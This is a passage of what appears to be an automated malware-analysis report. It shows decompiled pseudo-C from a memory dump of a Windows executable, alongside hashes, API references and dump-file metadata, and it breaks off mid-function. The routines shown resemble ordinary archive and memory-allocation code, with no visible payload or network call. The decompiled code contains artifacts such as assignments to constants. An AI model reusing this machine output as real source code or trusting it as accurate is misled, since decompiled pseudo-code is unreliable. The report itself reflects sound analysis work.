                                                                            0x001919c2
                                                                            0x001919c8
                                                                            0x001919c9
                                                                            0x001919cb
                                                                            0x001919d1
                                                                            0x001919d7
                                                                            0x001919df
                                                                            0x001919e4
                                                                            0x001919e4
                                                                            0x00000000
                                                                            0x001919cb
                                                                            0x001919a5
                                                                            0x00000000

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: cc3843631d4efef9e758eb8dd3241f574fe49e4eb5402b1606c959e6839bf6ac
                                                                            • Instruction ID: e5e105211ed45a2e1d9c9558728009c17220a5ba0ea32973c137d12f455fb088
                                                                            • Opcode Fuzzy Hash: cc3843631d4efef9e758eb8dd3241f574fe49e4eb5402b1606c959e6839bf6ac
                                                                            • Instruction Fuzzy Hash: EAB1BF70A04687BFEF29CF78C484BB9FBE6BF15304F140259E45A97281D730A9A4CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 91%
                                                                            			E001981C4(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __eflags) {
                                                                            				void* __esi;
                                                                            				void* _t47;
                                                                            				signed int _t50;
                                                                            				signed int _t51;
                                                                            				void* _t53;
                                                                            				signed int _t55;
                                                                            				signed int _t61;
                                                                            				intOrPtr _t73;
                                                                            				signed int _t80;
                                                                            				intOrPtr _t88;
                                                                            				void* _t89;
                                                                            				void* _t91;
                                                                            				intOrPtr _t93;
                                                                            				void* _t95;
                                                                            				void* _t98;
                                                                            
                                                                            				_t98 = __eflags;
                                                                            				_t90 = __edi;
                                                                            				_t88 = __edx;
                                                                            				_t73 = __ecx;
                                                                            				E001AD870(E001C12D2, _t95);
                                                                            				E001AD940();
                                                                            				_t93 = _t73;
                                                                            				_t1 = _t95 - 0x9d58; // -38232
                                                                            				E0019137D(_t1, _t88, __edi, _t98,  *(_t93 + 8));
                                                                            				 *(_t95 - 4) =  *(_t95 - 4) & 0x00000000;
                                                                            				_t6 = _t95 - 0x9d58; // -38232
                                                                            				if(E00199C0E(_t6, _t93 + 0xf4) != 0) {
                                                                            					_t7 = _t95 - 0x9d58; // -38232, executed
                                                                            					_t47 = E00191973(_t7, _t88, 1); // executed
                                                                            					if(_t47 != 0) {
                                                                            						__eflags =  *((char*)(_t95 - 0x3093));
                                                                            						if( *((char*)(_t95 - 0x3093)) == 0) {
                                                                            							_push(__edi);
                                                                            							_t91 = 0;
                                                                            							__eflags =  *(_t95 - 0x30a3);
                                                                            							if( *(_t95 - 0x30a3) != 0) {
                                                                            								_t10 = _t95 - 0x9d3a; // -38202
                                                                            								_t11 = _t95 - 0x1010; // -2064
                                                                            								_t61 = E0019FAB1(_t11, _t10, 0x800);
                                                                            								__eflags =  *(_t95 - 0x309e);
                                                                            								while(1) {
                                                                            									_t17 = _t95 - 0x1010; // -2064
                                                                            									E0019B782(_t17, 0x800, (_t61 & 0xffffff00 | __eflags == 0x00000000) & 0x000000ff);
                                                                            									_t18 = _t95 - 0x2058; // -6232
                                                                            									E00196EF9(_t18);
                                                                            									_push(0);
                                                                            									_t19 = _t95 - 0x2058; // -6232
                                                                            									_t20 = _t95 - 0x1010; // -2064
                                                                            									_t61 = E0019A1B1(_t18, _t88, __eflags, _t20, _t19);
                                                                            									__eflags = _t61;
                                                                            									if(_t61 == 0) {
                                                                            										break;
                                                                            									}
                                                                            									_t91 = _t91 +  *((intOrPtr*)(_t95 - 0x1058));
                                                                            									asm("adc ebx, [ebp-0x1054]");
                                                                            									__eflags =  *(_t95 - 0x309e);
                                                                            								}
                                                                            								 *((intOrPtr*)(_t93 + 0x98)) =  *((intOrPtr*)(_t93 + 0x98)) + _t91;
                                                                            								asm("adc [esi+0x9c], ebx");
                                                                            							}
                                                                            							_t23 = _t95 - 0x9d58; // -38232
                                                                            							E0019835C(_t93, _t88, _t23);
                                                                            							_t50 =  *(_t93 + 8);
                                                                            							_t89 = 0x49;
                                                                            							_pop(_t90);
                                                                            							_t80 =  *(_t50 + 0x82f2) & 0x0000ffff;
                                                                            							__eflags = _t80 - 0x54;
                                                                            							if(_t80 == 0x54) {
                                                                            								L11:
                                                                            								 *((char*)(_t50 + 0x61f9)) = 1;
                                                                            							} else {
                                                                            								__eflags = _t80 - _t89;
                                                                            								if(_t80 == _t89) {
                                                                            									goto L11;
                                                                            								}
                                                                            							}
                                                                            							_t51 =  *(_t93 + 8);
                                                                            							__eflags =  *((intOrPtr*)(_t51 + 0x82f2)) - _t89;
                                                                            							if( *((intOrPtr*)(_t51 + 0x82f2)) != _t89) {
                                                                            								__eflags =  *((char*)(_t51 + 0x61f9));
                                                                            								_t32 =  *((char*)(_t51 + 0x61f9)) == 0;
                                                                            								__eflags =  *((char*)(_t51 + 0x61f9)) == 0;
                                                                            								E001A0FBD((_t51 & 0xffffff00 | _t32) & 0x000000ff, (_t51 & 0xffffff00 | _t32) & 0x000000ff, _t93 + 0xf4);
                                                                            							}
                                                                            							_t33 = _t95 - 0x9d58; // -38232
                                                                            							E00191E4F(_t33, _t89);
                                                                            							do {
                                                                            								_t34 = _t95 - 0x9d58; // -38232
                                                                            								_t53 = E0019391A(_t34, _t89);
                                                                            								_t35 = _t95 - 0xd; // 0x7f3
                                                                            								_t36 = _t95 - 0x9d58; // -38232
                                                                            								_t55 = E001983C0(_t93, _t36, _t53, _t35); // executed
                                                                            								__eflags = _t55;
                                                                            							} while (_t55 != 0);
                                                                            						}
                                                                            					} else {
                                                                            						E00196E03(0x1d00e0, 1);
                                                                            					}
                                                                            				}
                                                                            				_t37 = _t95 - 0x9d58; // -38232, executed
                                                                            				E0019162D(_t37, _t90, _t93); // executed
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t95 - 0xc));
                                                                            				return 0;
                                                                            			}



















                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 001981C9
                                                                              • Part of subcall function 0019137D: __EH_prolog.LIBCMT ref: 00191382
                                                                              • Part of subcall function 0019137D: new.LIBCMT ref: 001913FA
                                                                              • Part of subcall function 00191973: __EH_prolog.LIBCMT ref: 00191978
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 22d19d27ae4c403e52e5dd238cbd0aef5c1cb795f2d286af06efa6e8c2295b3f
                                                                            • Instruction ID: 1b160a1d90f946ec507fa060befefdba1c28365379cf769fbab40283b155da9f
                                                                            • Opcode Fuzzy Hash: 22d19d27ae4c403e52e5dd238cbd0aef5c1cb795f2d286af06efa6e8c2295b3f
                                                                            • Instruction Fuzzy Hash: 9741A771940654AADF24EB60CC55FEA7378AF61704F0404EAE54AA3093DF74AFC8DB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
                                                                            			E001A2A7F(void* __ecx, void* __edx) {
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* _t29;
                                                                            				signed int _t30;
                                                                            				signed int* _t36;
                                                                            				signed int _t38;
                                                                            				intOrPtr _t39;
                                                                            				intOrPtr _t42;
                                                                            				signed int _t44;
                                                                            				void* _t47;
                                                                            				void* _t48;
                                                                            				void* _t56;
                                                                            				void* _t60;
                                                                            				signed int _t65;
                                                                            				void* _t67;
                                                                            				void* _t69;
                                                                            				void* _t73;
                                                                            
                                                                            				_t56 = __edx;
                                                                            				_t48 = __ecx;
                                                                            				_t29 = E001AD870(E001C1486, _t67);
                                                                            				_push(_t48);
                                                                            				_push(_t48);
                                                                            				_t60 = _t48;
                                                                            				_t44 = 0;
                                                                            				_t72 =  *((intOrPtr*)(_t60 + 0x20));
                                                                            				if( *((intOrPtr*)(_t60 + 0x20)) == 0) {
                                                                            					_push(0x400400); // executed
                                                                            					_t42 = E001ADB02(_t48, _t56, 0x400400, _t72); // executed
                                                                            					 *((intOrPtr*)(_t60 + 0x20)) = _t42;
                                                                            					_t29 = E001AE920(_t60, _t42, 0, 0x400400);
                                                                            					_t69 = _t69 + 0x10;
                                                                            				}
                                                                            				_t73 =  *(_t60 + 0x18) - _t44;
                                                                            				if(_t73 == 0) {
                                                                            					_t65 =  *((intOrPtr*)(_t60 + 0x1c)) +  *((intOrPtr*)(_t60 + 0x1c));
                                                                            					_t30 = _t65;
                                                                            					 *(_t67 - 0x10) = _t65;
                                                                            					_t58 = _t30 * 0x4ae4 >> 0x20;
                                                                            					_push( ~(0 | _t73 > 0x00000000) | ( ~(_t73 > 0) | _t30 * 0x00004ae4) + 0x00000004);
                                                                            					_t36 = E001ADB02(( ~(_t73 > 0) | _t30 * 0x00004ae4) + 4, _t30 * 0x4ae4 >> 0x20, _t65, _t73);
                                                                            					_pop(0x1d00e0);
                                                                            					 *(_t67 - 0x14) = _t36;
                                                                            					 *(_t67 - 4) = _t44;
                                                                            					_t74 = _t36;
                                                                            					if(_t36 != 0) {
                                                                            						_push(E001A1788);
                                                                            						_push(E001A1611);
                                                                            						_push(_t65);
                                                                            						_t16 =  &(_t36[1]); // 0x4
                                                                            						_t44 = _t16;
                                                                            						 *_t36 = _t65;
                                                                            						_push(0x4ae4);
                                                                            						_push(_t44);
                                                                            						E001AD96D(_t58, _t74);
                                                                            					}
                                                                            					 *(_t67 - 4) =  *(_t67 - 4) | 0xffffffff;
                                                                            					 *(_t60 + 0x18) = _t44;
                                                                            					_t29 = E001AE920(_t60, _t44, 0, _t65 * 0x4ae4);
                                                                            					if(_t65 != 0) {
                                                                            						_t38 = 0;
                                                                            						 *(_t67 - 0x10) = 0;
                                                                            						do {
                                                                            							_t47 =  *(_t60 + 0x18) + _t38;
                                                                            							if( *((intOrPtr*)(_t47 + 0x4ad4)) == 0) {
                                                                            								 *((intOrPtr*)(_t47 + 0x4adc)) = 0x4100;
                                                                            								_t39 = E001B2B53(0x1d00e0); // executed
                                                                            								 *((intOrPtr*)(_t47 + 0x4ad4)) = _t39;
                                                                            								0x1d00e0 = 0x30c00;
                                                                            								if(_t39 == 0) {
                                                                            									E00196D3A(0x1d00e0);
                                                                            								}
                                                                            								_t38 =  *(_t67 - 0x10);
                                                                            							}
                                                                            							_t38 = _t38 + 0x4ae4;
                                                                            							 *(_t67 - 0x10) = _t38;
                                                                            							_t65 = _t65 - 1;
                                                                            						} while (_t65 != 0);
                                                                            					}
                                                                            				}
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t67 - 0xc));
                                                                            				return _t29;
                                                                            			}





















                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 23916a95d97ed3e3babf353620c67fb2c7c3a8213201d2b2799079005d3e8b45
                                                                            • Instruction ID: 79d35b55778951dd961f5c557a93fe2d4995c0110a9f2e80dbc7ec9e08ee48b5
                                                                            • Opcode Fuzzy Hash: 23916a95d97ed3e3babf353620c67fb2c7c3a8213201d2b2799079005d3e8b45
                                                                            • Instruction Fuzzy Hash: 6421F3B5E40215AFDB14DF78DC42A6B77A8FB16314F04463AE919EB682E7709D00C7A8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                            			E001A9EEF(void* __ecx, void* __edx, void* __eflags) {
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				short _t33;
                                                                            				char _t36;
                                                                            				void* _t47;
                                                                            				void* _t50;
                                                                            				short _t55;
                                                                            				void* _t57;
                                                                            				void* _t58;
                                                                            				short _t60;
                                                                            				void* _t62;
                                                                            				intOrPtr _t64;
                                                                            				void* _t67;
                                                                            
                                                                            				_t67 = __eflags;
                                                                            				_t57 = __edx;
                                                                            				_t47 = __ecx;
                                                                            				E001AD870(E001C14E1, _t62);
                                                                            				_push(_t47);
                                                                            				E001AD940();
                                                                            				_push(_t60);
                                                                            				_push(_t58);
                                                                            				 *((intOrPtr*)(_t62 - 0x10)) = _t64;
                                                                            				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                            				E0019137D(_t62 - 0x7d24, _t57, _t58, _t67, 0); // executed
                                                                            				 *((char*)(_t62 - 4)) = 1;
                                                                            				E00191E9E(_t62 - 0x7d24, _t57, _t62, _t67,  *((intOrPtr*)(_t62 + 0xc)));
                                                                            				if( *((intOrPtr*)(_t62 - 0x105f)) == 0) {
                                                                            					 *((intOrPtr*)(_t62 - 0x24)) = 0;
                                                                            					 *((intOrPtr*)(_t62 - 0x20)) = 0;
                                                                            					 *((intOrPtr*)(_t62 - 0x1c)) = 0;
                                                                            					 *((intOrPtr*)(_t62 - 0x18)) = 0;
                                                                            					 *((char*)(_t62 - 0x14)) = 0;
                                                                            					 *((char*)(_t62 - 4)) = 2;
                                                                            					_t50 = _t62 - 0x7d24;
                                                                            					_t33 = E0019192E(_t57, _t62 - 0x24);
                                                                            					__eflags = _t33;
                                                                            					if(_t33 != 0) {
                                                                            						_t60 =  *((intOrPtr*)(_t62 - 0x20));
                                                                            						_t58 = _t60 + _t60;
                                                                            						_push(_t58 + 2);
                                                                            						_t55 = E001B2B53(_t50);
                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x10)))) = _t55;
                                                                            						__eflags = _t55;
                                                                            						if(_t55 != 0) {
                                                                            							__eflags = 0;
                                                                            							 *((short*)(_t58 + _t55)) = 0;
                                                                            							E001AEA80(_t55,  *((intOrPtr*)(_t62 - 0x24)), _t58);
                                                                            						} else {
                                                                            							_t60 = 0;
                                                                            						}
                                                                            						 *((intOrPtr*)( *((intOrPtr*)(_t62 + 0x14)))) = _t60;
                                                                            					}
                                                                            					E001915E3(_t62 - 0x24);
                                                                            					E0019162D(_t62 - 0x7d24, _t58, _t60); // executed
                                                                            					_t36 = 1;
                                                                            				} else {
                                                                            					E0019162D(_t62 - 0x7d24, _t58, _t60);
                                                                            					_t36 = 0;
                                                                            				}
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t62 - 0xc));
                                                                            				return _t36;
                                                                            			}

















                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 001A9EF4
                                                                              • Part of subcall function 0019137D: __EH_prolog.LIBCMT ref: 00191382
                                                                              • Part of subcall function 0019137D: new.LIBCMT ref: 001913FA
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 52461969112ac028d6c452ef93ef0a3c5bbe6d553d96c96c556426f3fe745643
                                                                            • Instruction ID: 5819d9d901749ba681429158eb941675f4bef532b093e96690262d4c25cfaaa8
                                                                            • Opcode Fuzzy Hash: 52461969112ac028d6c452ef93ef0a3c5bbe6d553d96c96c556426f3fe745643
                                                                            • Instruction Fuzzy Hash: CA218E75D0424AAECF15DF95D9819EEBBF4BF2A304F0004AEE809A7202D7356E45CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E0019910B(void* __ebx, void* __edx, void* __edi, void* __eflags) {
                                                                            				void* _t21;
                                                                            				intOrPtr _t22;
                                                                            				intOrPtr _t27;
                                                                            				void* _t35;
                                                                            				intOrPtr _t37;
                                                                            				intOrPtr _t40;
                                                                            				void* _t42;
                                                                            				void* _t49;
                                                                            
                                                                            				_t35 = __edx;
                                                                            				E001AD870(E001C1321, _t42);
                                                                            				E00196ED7(_t42 - 0x20, E00197C3C());
                                                                            				_push( *((intOrPtr*)(_t42 - 0x1c)));
                                                                            				_push( *((intOrPtr*)(_t42 - 0x20)));
                                                                            				 *(_t42 - 4) =  *(_t42 - 4) & 0x00000000;
                                                                            				_t40 = E0019C70F();
                                                                            				if(_t40 > 0) {
                                                                            					_t27 =  *((intOrPtr*)(_t42 + 0x10));
                                                                            					_t37 =  *((intOrPtr*)(_t42 + 0xc));
                                                                            					do {
                                                                            						_t22 = _t40;
                                                                            						asm("cdq");
                                                                            						_t49 = _t35 - _t27;
                                                                            						if(_t49 > 0 || _t49 >= 0 && _t22 >= _t37) {
                                                                            							_t40 = _t37;
                                                                            						}
                                                                            						if(_t40 > 0) {
                                                                            							E0019C8C7( *((intOrPtr*)(_t42 + 8)), _t42,  *((intOrPtr*)(_t42 - 0x20)), _t40);
                                                                            							asm("cdq");
                                                                            							_t37 = _t37 - _t40;
                                                                            							asm("sbb ebx, edx");
                                                                            						}
                                                                            						_push( *((intOrPtr*)(_t42 - 0x1c)));
                                                                            						_push( *((intOrPtr*)(_t42 - 0x20)));
                                                                            						_t40 = E0019C70F();
                                                                            					} while (_t40 > 0);
                                                                            				}
                                                                            				_t21 = E0019159C(_t42 - 0x20); // executed
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t42 - 0xc));
                                                                            				return _t21;
                                                                            			}












                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: ef79b468bf778a9bed5266109b83200dd0db59098bdde32aee9b4b57175348cf
                                                                            • Instruction ID: 9f185353335e7d2b8f1b20a8feb8595ce2281d6d481e7ad56b516c5ed83a7d7d
                                                                            • Opcode Fuzzy Hash: ef79b468bf778a9bed5266109b83200dd0db59098bdde32aee9b4b57175348cf
                                                                            • Instruction Fuzzy Hash: A811A177E00429ABCF16ABACCC519EEB736BF58760F054529F811A7252CB348D148BE0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E001AC6FF(void* __ecx, void* __eflags) {
                                                                            				void* __ebx;
                                                                            				intOrPtr _t18;
                                                                            				char _t19;
                                                                            				char _t20;
                                                                            				void* _t23;
                                                                            				void* _t24;
                                                                            				void* _t26;
                                                                            				void* _t37;
                                                                            				void* _t43;
                                                                            				intOrPtr _t45;
                                                                            
                                                                            				_t26 = __ecx;
                                                                            				E001AD870(E001C1520, _t43);
                                                                            				_push(_t26);
                                                                            				E001AD940();
                                                                            				_push(_t24);
                                                                            				 *((intOrPtr*)(_t43 - 0x10)) = _t45;
                                                                            				E001B4D7E(0x1e39fa, "X");
                                                                            				E0019FB08(0x1e5a1c, _t37, 0x1c22e0);
                                                                            				E001B4D7E(0x1e4a1a,  *((intOrPtr*)(_t43 + 0xc)));
                                                                            				E00195A9F(0x1db708, _t37,  *((intOrPtr*)(_t43 + 0xc)));
                                                                            				_t4 = _t43 - 4;
                                                                            				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                            				_t18 = 2;
                                                                            				 *0x1e29d8 = _t18;
                                                                            				 *0x1e29d4 = _t18;
                                                                            				 *0x1e29d0 = _t18;
                                                                            				_t19 =  *0x1d75d4; // 0x0
                                                                            				 *0x1e185b = _t19;
                                                                            				_t20 =  *0x1d75d5; // 0x1
                                                                            				 *0x1e1894 = 1;
                                                                            				 *0x1e1897 = 1;
                                                                            				 *0x1e185c = _t20;
                                                                            				E00197ADF(_t43 - 0x2108, _t37,  *_t4, 0x1db708);
                                                                            				 *(_t43 - 4) = 1;
                                                                            				E00197C55(_t43 - 0x2108, _t37,  *_t4);
                                                                            				_t23 = E00197B71(_t24, _t43 - 0x2108, _t37); // executed
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t43 - 0xc));
                                                                            				return _t23;
                                                                            			}














                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 001AC704
                                                                              • Part of subcall function 00197ADF: __EH_prolog.LIBCMT ref: 00197AE4
                                                                              • Part of subcall function 00197ADF: new.LIBCMT ref: 00197B28
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 58654063c79b6e3703dd14299d9c2992fb6d83f03eb3071f2dbdcd7c88d80cd0
                                                                            • Instruction ID: c1533dda1b3b347eb382e259f9fbf1ab4d52f4734bd2c0d77983d18a777957a1
                                                                            • Opcode Fuzzy Hash: 58654063c79b6e3703dd14299d9c2992fb6d83f03eb3071f2dbdcd7c88d80cd0
                                                                            • Instruction Fuzzy Hash: 9411E7755092D4AEC704DBA8E992BEC7BB4DB75314F04406FF4096B693DBB11AC4CB21
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E00195A1D(intOrPtr __ecx, void* __eflags) {
                                                                            				intOrPtr _t25;
                                                                            				intOrPtr _t34;
                                                                            				void* _t36;
                                                                            
                                                                            				_t25 = __ecx;
                                                                            				E001AD870(E001C1216, _t36);
                                                                            				_push(_t25);
                                                                            				_t34 = _t25;
                                                                            				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                                                                            				E0019AD1B(_t25); // executed
                                                                            				_t2 = _t36 - 4;
                                                                            				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                                                                            				E0019FAE6();
                                                                            				 *(_t36 - 4) = 1;
                                                                            				E0019FAE6();
                                                                            				 *(_t36 - 4) = 2;
                                                                            				E0019FAE6();
                                                                            				 *(_t36 - 4) = 3;
                                                                            				E0019FAE6();
                                                                            				 *(_t36 - 4) = 4;
                                                                            				E0019FAE6();
                                                                            				 *(_t36 - 4) = 5;
                                                                            				E00195C12(_t34,  *_t2);
                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                                                                            				return _t34;
                                                                            			}







                                                                            APIs
                                                                            • __EH_prolog.LIBCMT ref: 00195A22
                                                                              • Part of subcall function 0019AD1B: __EH_prolog.LIBCMT ref: 0019AD20
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: H_prolog
                                                                            • String ID:
                                                                            • API String ID: 3519838083-0
                                                                            • Opcode ID: 0be03aeb828a7570634589183e732fdfb369407fedcc67e9d71dc80ff0185161
                                                                            • Instruction ID: 46013952863dd7795617ce979ee9ebeab5728dabafbe9b5f28975454476e9c79
                                                                            • Opcode Fuzzy Hash: 0be03aeb828a7570634589183e732fdfb369407fedcc67e9d71dc80ff0185161
                                                                            • Instruction Fuzzy Hash: 39018134919644EEDB15EBA4C2057EEB7E8AF36318F10059DE44E93382CBB82B05C763
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 94%
                                                                            			E001B7A8A(void* __ecx, long _a4) {
                                                                            				void* __esi;
                                                                            				void* _t4;
                                                                            				void* _t6;
                                                                            				void* _t7;
                                                                            				void* _t8;
                                                                            				long _t9;
                                                                            
                                                                            				_t7 = __ecx;
                                                                            				_t9 = _a4;
                                                                            				if(_t9 > 0xffffffe0) {
                                                                            					L7:
                                                                            					 *((intOrPtr*)(E001B7ECC())) = 0xc;
                                                                            					__eflags = 0;
                                                                            					return 0;
                                                                            				}
                                                                            				if(_t9 == 0) {
                                                                            					_t9 = _t9 + 1;
                                                                            				}
                                                                            				while(1) {
                                                                            					_t4 = RtlAllocateHeap( *0x1f0874, 0, _t9); // executed
                                                                            					if(_t4 != 0) {
                                                                            						break;
                                                                            					}
                                                                            					__eflags = E001B7906();
                                                                            					if(__eflags == 0) {
                                                                            						goto L7;
                                                                            					}
                                                                            					_t6 = E001B6763(_t7, _t8, _t9, __eflags, _t9);
                                                                            					_pop(_t7);
                                                                            					__eflags = _t6;
                                                                            					if(_t6 == 0) {
                                                                            						goto L7;
                                                                            					}
                                                                            				}
                                                                            				return _t4;
                                                                            			}










                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,001B2FA6,?,0000015D,?,?,?,?,001B4482,000000FF,00000000,?,?), ref: 001B7ABC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 4bd6ad06959d2b83239730aabeb7017a3a07a7e64e9c9ea87e75ceb44f7f08a9
                                                                            • Instruction ID: a2804987e0cc494b890bef1f85822d8eb4406750089ba4dfa50857138cf4fc58
                                                                            • Opcode Fuzzy Hash: 4bd6ad06959d2b83239730aabeb7017a3a07a7e64e9c9ea87e75ceb44f7f08a9
                                                                            • Instruction Fuzzy Hash: EAE06D356482227BE6A236759D01BEE7A49EFE17B1F1E0121EC15A71D1CF60CE40C2E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 89%
                                                                            			E001994DA(void* __ecx) {
                                                                            				void* _t16;
                                                                            				void* _t21;
                                                                            
                                                                            				_t21 = __ecx;
                                                                            				_t16 = 1;
